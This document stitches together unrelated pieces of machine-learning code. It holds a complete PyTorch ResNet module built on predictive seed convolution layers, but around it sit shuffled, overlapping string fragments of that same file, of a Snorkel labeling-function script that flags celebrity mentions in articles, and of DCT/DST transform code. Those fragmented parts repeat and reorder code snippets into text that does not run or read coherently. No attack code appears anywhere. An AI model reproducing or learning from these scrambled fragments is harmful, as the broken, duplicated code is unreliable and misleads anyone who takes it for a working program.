num_blocks[0],", "* std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif", "out = F.relu(out) return out class ResNet(nn.Module): def __init__(self, block,", "torch.ones_like(module.weight.data) * std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\")", "stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut = nn.Sequential()", "= self.layer1(out) out = self.layer2(out) out = self.layer3(out) if self.layer4", "+ fan_out)) with torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif", "kernel_size=1, bias=False) self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)", "_make_layer(self, block, planes, num_blocks, stride): strides = [stride] + [1]*(num_blocks-1)", "out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out = self.layer2(out) out", "self.layer4(out) # out = F.avg_pool2d(out, 4) out = F.avg_pool2d(out, out.size()[3])", "= sparsify SIGN = sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method)", "see 'preact_resnet.py'. 
'''ResNet in PyTorch.

For Pre-activation ResNet, see 'preact_resnet.py'.

Reference:
[1] <NAME>, <NAME>, <NAME>, <NAME>
    Deep Residual Learning for Image Recognition. arXiv:1512.03385
'''
from numpy.lib.arraysetops import isin
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import numpy as np

from models.masked_psg_seed_conv import PredictiveSeedConv2d
from masked_layers import layers

# Fixed
NUM_BITS = 32
NUM_BITS_WEIGHT = 32
NUM_BITS_GRAD = None
BIPRECISION = False
PREDICTIVE_FORWARD = False
WRITER = None
WRITER_PREFIX_COUNTER = 0

# Tunable
PREDICTIVE_BACKWARD = True
MSB_BITS = 4
MSB_BITS_WEIGHT = 4
MSB_BITS_GRAD = 8
THRESHOLD = 0.0
SPARSIFY = False
SIGN = True


def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=""):
    "1x1 convolution with no padding"
    predictive_forward = PREDICTIVE_FORWARD and predictive_forward
    return PredictiveSeedConv2d(
        in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False,
        num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,
        biprecision=BIPRECISION, input_signed=input_signed,
        predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,
        msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD,
        threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN,
        writer=WRITER, writer_prefix=writer_prefix)


def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=""):
    "3x3 convolution with padding"
    predictive_forward = PREDICTIVE_FORWARD and predictive_forward
    return PredictiveSeedConv2d(
        in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False,
        num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,
        biprecision=BIPRECISION, input_signed=input_signed,
        predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,
        msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD,
        threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN,
        writer=WRITER, writer_prefix=writer_prefix)


class BasicBlock(nn.Module):
    expansion = 1

    def __init__(self, in_planes, planes, stride=1):
        super(BasicBlock, self).__init__()
        self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)
        self.bn2 = nn.BatchNorm2d(planes)

        self.shortcut = nn.Sequential()
        if stride != 1 or in_planes != self.expansion*planes:
            self.shortcut = nn.Sequential(
                # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
                conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None),
                nn.BatchNorm2d(self.expansion*planes)
            )

    def forward(self, x):
        out = F.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        out += self.shortcut(x)
        out = F.relu(out)
        return out


class Bottleneck(nn.Module):
    expansion = 4

    def __init__(self, in_planes, planes, stride=1):
        super(Bottleneck, self).__init__()
        # self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
        self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)
        self.bn1 = nn.BatchNorm2d(planes)
        # self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
        self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)
        self.bn2 = nn.BatchNorm2d(planes)
        # self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
        self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)
        self.bn3 = nn.BatchNorm2d(self.expansion*planes)

        self.shortcut = nn.Sequential()
        if stride != 1 or in_planes != self.expansion*planes:
            self.shortcut = nn.Sequential(
                # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
                conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None),
                nn.BatchNorm2d(self.expansion*planes)
            )

    def forward(self, x):
        out = F.relu(self.bn1(self.conv1(x)))
        out = F.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        out += self.shortcut(x)
        out = F.relu(out)
        return out


class ResNet(nn.Module):
    def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'):
        super(ResNet, self).__init__()
        self.in_planes = in_planes

        self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None)
        self.bn1 = nn.BatchNorm2d(self.in_planes)
        if self.in_planes == 64:
            # self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
            self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
            self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
            self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
            self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
            self.linear = nn.Linear(512*block.expansion, num_classes)
            #self.linear = layers.Linear(512*block.expansion, num_classes)
        elif self.in_planes == 16:
            self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)
            self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)
            self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)
            self.layer4 = None
            self.linear = nn.Linear(64, num_classes)

        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                self.reset_parameters(m, init_method)
        print('weights reset to {}'.format(init_method))

    def reset_parameters(self, module, init_method="kaiming_uniform") -> None:
        if init_method == "kaiming_constant_signed":
            fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
            gain = nn.init.calculate_gain("relu")
            std = gain / math.sqrt(fan)
            with torch.no_grad():
                module.weight.data = module.weight.data.sign() * std
        elif init_method == "kaiming_constant_unsigned":
            fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
            gain = nn.init.calculate_gain("relu")
            std = gain / math.sqrt(fan)
            with torch.no_grad():
                module.weight.data = torch.ones_like(module.weight.data) * std
        elif init_method == "kaiming_normal":
            nn.init.kaiming_normal_(module.weight, mode="fan_in", nonlinearity="relu")
        elif init_method == "kaiming_uniform":
            nn.init.kaiming_uniform_(module.weight, mode="fan_in", nonlinearity="relu")
        elif init_method == "kaiming_laplace":
            fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
            gain = nn.init.calculate_gain("relu")
            scale = gain / math.sqrt(2.0 * fan)
            with torch.no_grad():
                new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)
                module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())
        elif init_method == "xavier_normal":
            nn.init.xavier_normal_(module.weight)
        elif init_method == "xavier_constant":
            fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)
            std = math.sqrt(2.0 / float(fan_in + fan_out))
            with torch.no_grad():
                module.weight.data = module.weight.data.sign() * std
        elif init_method == "standard":
            nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))
        else:
            raise ValueError(f"{init_method} is not an initialization option!")

    def reset_conv_parameters(self, init_method="standard") -> None:
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                self.reset_parameters(m, init_method)

    def get_bop_params(self):
        bop_params = []
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                bop_params += list(m.parameters())
        return bop_params

    def get_non_bop_params(self):
        non_bop_params = []
        for m in self.modules():
            if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):
                non_bop_params += list(m.parameters())
        return non_bop_params

    def _make_layer(self, block, planes, num_blocks, stride):
        strides = [stride] + [1]*(num_blocks-1)
        layers = []
        for stride in strides:
            layers.append(block(self.in_planes, planes, stride))
            self.in_planes = planes * block.expansion
        return nn.Sequential(*layers)

    def forward(self, x):
        out = F.relu(self.bn1(self.conv1(x)))
        out = self.layer1(out)
        out = self.layer2(out)
        out = self.layer3(out)
        if self.layer4 is not None:
            out = self.layer4(out)
        # out = F.avg_pool2d(out, 4)
        out = F.avg_pool2d(out, out.size()[3])
        out = out.view(out.size(0), -1)
        out = self.linear(out)
        return out


def PsgSeedResNet20(
    num_classes=10, init_method='standard',
    predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,
    threshold=0.0, sparsify=False, sign=True
):
    global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
    PREDICTIVE_BACKWARD = predictive_backward
    MSB_BITS = msb_bits
    MSB_BITS_WEIGHT = msb_bits_weight
    MSB_BITS_GRAD = msb_bits_grad
    THRESHOLD = threshold
    SPARSIFY = sparsify
    SIGN = sign
    return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method)


def PsgSeedResNet18(
    num_classes=10, init_method='standard',
    predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,
    threshold=0.0, sparsify=False, sign=True
):
    global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
    PREDICTIVE_BACKWARD = predictive_backward
    MSB_BITS = msb_bits
    MSB_BITS_WEIGHT = msb_bits_weight
    MSB_BITS_GRAD = msb_bits_grad
    THRESHOLD = threshold
    SPARSIFY = sparsify
    SIGN = sign
    return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method)


def PsgSeedResNet34(
    num_classes=10, init_method='standard',
    predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,
    threshold=0.0, sparsify=False, sign=True
):
    global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
    PREDICTIVE_BACKWARD = predictive_backward
    MSB_BITS = msb_bits
    MSB_BITS_WEIGHT = msb_bits_weight
    MSB_BITS_GRAD = msb_bits_grad
    THRESHOLD = threshold
    SPARSIFY = sparsify
    SIGN = sign
    return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method)


def PsgSeedResNet50(
    num_classes=10, init_method='standard',
    predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,
    threshold=0.0, sparsify=False, sign=True
):
    global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
    PREDICTIVE_BACKWARD = predictive_backward
    MSB_BITS = msb_bits
    MSB_BITS_WEIGHT = msb_bits_weight
    MSB_BITS_GRAD = msb_bits_grad
    THRESHOLD = threshold
    SPARSIFY = sparsify
    SIGN = sign
    return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method)


def PsgSeedResNet101(
    num_classes=10, init_method='standard',
    predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,
    threshold=0.0, sparsify=False, sign=True
):
    global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
    PREDICTIVE_BACKWARD = predictive_backward
    MSB_BITS = msb_bits
    MSB_BITS_WEIGHT = msb_bits_weight
    MSB_BITS_GRAD = msb_bits_grad
    THRESHOLD = threshold
    SPARSIFY = sparsify
    SIGN = sign
    return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method)


def PsgSeedResNet152(
    num_classes=10, init_method='standard',
    predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,
    threshold=0.0, sparsify=False, sign=True
):
    global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
    PREDICTIVE_BACKWARD = predictive_backward
    MSB_BITS = msb_bits
    MSB_BITS_WEIGHT = msb_bits_weight
    MSB_BITS_GRAD = msb_bits_grad
    THRESHOLD = threshold
    SPARSIFY = sparsify
    SIGN = sign
    return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method)


def test():
    net = PsgSeedResNet18()
    y = net(torch.randn(1, 3, 32, 32))
    print(y.size())
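A minimal usage sketch for the module above, assuming PredictiveSeedConv2d behaves as an nn.Conv2d subclass so that get_bop_params() picks up the seed-conv weights; the two-group optimizer split and all hyperparameters here are illustrative assumptions, not part of the source.

import torch
import torch.optim as optim

net = PsgSeedResNet20(num_classes=10, init_method='standard')
optimizer = optim.SGD(
    [
        {'params': net.get_bop_params(), 'lr': 0.1},       # assumed: conv (seed) weights
        {'params': net.get_non_bop_params(), 'lr': 0.01},  # nn.Linear / nn.BatchNorm2d params
    ],
    lr=0.1, momentum=0.9, weight_decay=5e-4,
)
logits = net(torch.randn(8, 3, 32, 32))  # CIFAR-sized input batch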
[ "def person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents: if ent.label_ ==", "from pyspark.sql import Row from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark", "if ent.label_ == \"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\",", "return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base):", "if ent.label_ == \"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return POSITIVE", "import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE = 0 POSITIVE =", "ent.label_ == \"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text],", "body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent in", "return ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE if \"fortune\" in", "for ent in x.doc.ents: if ent.label_ == \"PERSON\": return ABSTAIN", "combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x):", "and ent.text.lower() in celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function() def", "== \"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return POSITIVE return ABSTAIN", "= 1 @preprocessor() def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\")", "\"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function()", "POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE if \"fortune\"", "ent in x.doc.ents: if ent.label_ == \"PERSON\": return ABSTAIN return", "snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import", "labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import preprocessor from", "pre=[combine_text]) def article_mentions_person(x): for ent in x.doc.ents: if ent.label_ ==", "NEGATIVE = 0 POSITIVE = 1 @preprocessor() def combine_text(x): return", "= -1 NEGATIVE = 0 POSITIVE = 1 @preprocessor() def", "-1 NEGATIVE = 0 POSITIVE = 1 @preprocessor() def combine_text(x):", "ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x,", "return POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE if", "snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import preprocessor from drybell_lfs import", "Row from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from", "article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent in x.doc.ents:", "= 0 POSITIVE = 1 @preprocessor() def combine_text(x): return Row(title=x.title,", "celebrity_knowledge_base): for ent in x.doc.ents: if ent.label_ == \"PERSON\" and", "NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", 
pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for", "== \"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()),", "@labeling_function() def body_contains_fortune(x): return POSITIVE if \"fortune\" in x.body else", "pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents:", "POSITIVE = 1 @preprocessor() def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title}", "from drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE = 0", "text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for ent in", "1 @preprocessor() def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\",", "ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE if \"fortune\" in x.body", "def body_contains_fortune(x): return POSITIVE if \"fortune\" in x.body else ABSTAIN", "person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents: if ent.label_ == \"PERSON\"", "ent.text.lower() in celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x):", "snorkel.preprocess import preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1", "\"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), )", "from snorkel.preprocess import preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN =", "spark_nlp_labeling_function from snorkel.preprocess import preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN", "@preprocessor() def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text])", "@spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent in x.doc.ents: if ent.label_", "from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import preprocessor from drybell_lfs", "ent in x.doc.ents: if ent.label_ == \"PERSON\" and ent.text.lower() in", "{x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent in x.doc.ents: if", "0 POSITIVE = 1 @preprocessor() def combine_text(x): return Row(title=x.title, body=x.body,", "for ent in x.doc.ents: if ent.label_ == \"PERSON\" and ent.text.lower()", "drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE = 0 POSITIVE", "import preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE", "return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for", "celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE", "def article_mentions_person(x): for ent in x.doc.ents: if ent.label_ == 
\"PERSON\":", "Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent", "@spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for ent", "import Row from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function", "x.doc.ents: if ent.label_ == \"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return", "article_mentions_person(x): for ent in x.doc.ents: if ent.label_ == \"PERSON\": return", "ABSTAIN = -1 NEGATIVE = 0 POSITIVE = 1 @preprocessor()", ") def person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents: if ent.label_", "preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE =", "def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def", "ent.label_ == \"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return POSITIVE return", "load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE = 0 POSITIVE = 1", "import spark_nlp_labeling_function from snorkel.preprocess import preprocessor from drybell_lfs import load_celebrity_knowledge_base", "x.doc.ents: if ent.label_ == \"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function(", "pyspark.sql import Row from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import", "from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess", "import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import preprocessor", "in celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x): return", "resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents: if", "in x.doc.ents: if ent.label_ == \"PERSON\" and ent.text.lower() in celebrity_knowledge_base:", "<filename>drybell/drybell_lfs_spark.py from pyspark.sql import Row from snorkel.labeling.lf import labeling_function from", "in x.doc.ents: if ent.label_ == \"PERSON\": return ABSTAIN return NEGATIVE", "return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def" ]
[ ":(N+1)//2, 0] z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z", "j} exp(-j*2*pi*(u*i/M + v*j/N)) = \\sum_i \\sum_j x_{i, j} (cos(-2*pi*(u*i/M", "..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1 \"\"\" perm =", "x.ndimension() <= 1: x_reorder = x.view([1, N]) else: x_reorder =", "I found add is much faster than sum #y =", "def idct_idxst(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete Cosine-Sine", "than sum #y = y.sum(dim=-1) return y[..., 0]+y[..., 1] def", "signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N) if len(x.size()) == 1:", "The actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1,", "following array 0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ...,", "products of trigonometric functions to sums. sin(a) sin(b) = 1/2", "introduce a new dimension # Must use IFFT here y", "transformation leveraging fast fourier transform engine. The math here mainly", "signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :] y.mul_(1.0/N) if expk is None:", "batch tensor, the 2D part is MxN @param expk0 with", "expk_1=None): ''' Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization", "torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, sin # I use", "+ v*j/N)) = \\sum_i \\sum_j x_{i, j} (cos(-2*pi*(u*i/M + v*j/N))", "= \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N)) = \\sum_i", "Inverse Discrete Cosine-Cosine Transformation without normalization to coefficients. It computes", "normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return", "y def dct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine", "Compute 1D DCT twice. @param x batch tensor, the 2D", "3. Perform IFFT 4. 
Extract the real part @param x", "return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None):", "y_{u, v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute", "return y[..., 0]+y[..., 1] def dct_N(x, perm=None, expk=None): \"\"\" Batch", "dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)", "here becomes -2 because complex numbers introduce a new dimension", "import torch import torch.nn.functional as F import pdb \"\"\" Discrete", "cosine tranformation and 1 or sine transformation @param expk 2*exp(j*pi*k/(2N))", "The trigonometric identities exploited by prosthaphaeresis relate products of trigonometric", "= cos(pi*u/(2N)) - j * sin(pi*u/(2N)) pik_by_2N = torch.arange(N, dtype=dtype,", "speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[..., perm, :] x_reorder =", "F.pad(x, (0, N), 'constant', 0) # the last dimension here", "x.clone() # switch from row-major to column-major for speedup x_reorder.transpose_(dim0=-2,", "@param expkp1_1 with length N \"\"\" return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2,", "M @param expk1 with length N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1),", "= \\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements the 2N padding trick to", "By mapping the original image from (i, j) to (i,", "= \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the 2N padding trick to", "Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization to coefficients.", "y def idct_N(x, expk=None): N = x.size(-1) if expk is", "1] def idct_2N(x, expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation", "@param expkp1_0 with length M @param expkp1_1 with length N", "expk=None): \"\"\" Batch Discrete Cosine Transformation without normalization to coefficients.", "derive various cos/sin transformation by computing FFT twice. \"\"\" def", "device): # Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j * sin(pi*u/(2N))", "tensor for conversion @param cos_or_sin_flag 0 for cosine tranformation and", "the last dimension here becomes -2 because complex numbers introduce", "FFT twice. \"\"\" def get_expk(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)),", "the same. The actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This will", "Compute 1D DST twice. @param x batch tensor, the 2D", "expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1) return expk.contiguous() def get_perm(N, dtype,", "sin(b) = 1/2 * (sin(a-b) - sin(a+b)) A 2D FFT", "by computing FFT twice. \"\"\" def get_expk(N, dtype, device): \"\"\"", "0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def idxst_idct(x, expk_0=None, expk_1=None): '''", "2*exp(-1j*pi*u/(2N)), but not exactly the same. The actual return is", "without normalization to coefficients. Compute idct(idxst(x)). @param x batch tensor,", "with length M @param expk0 with length M @param perm1", "if expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) #", "2*exp(1j*pi*u/(2N)) 2. Pad x by zeros 3. 
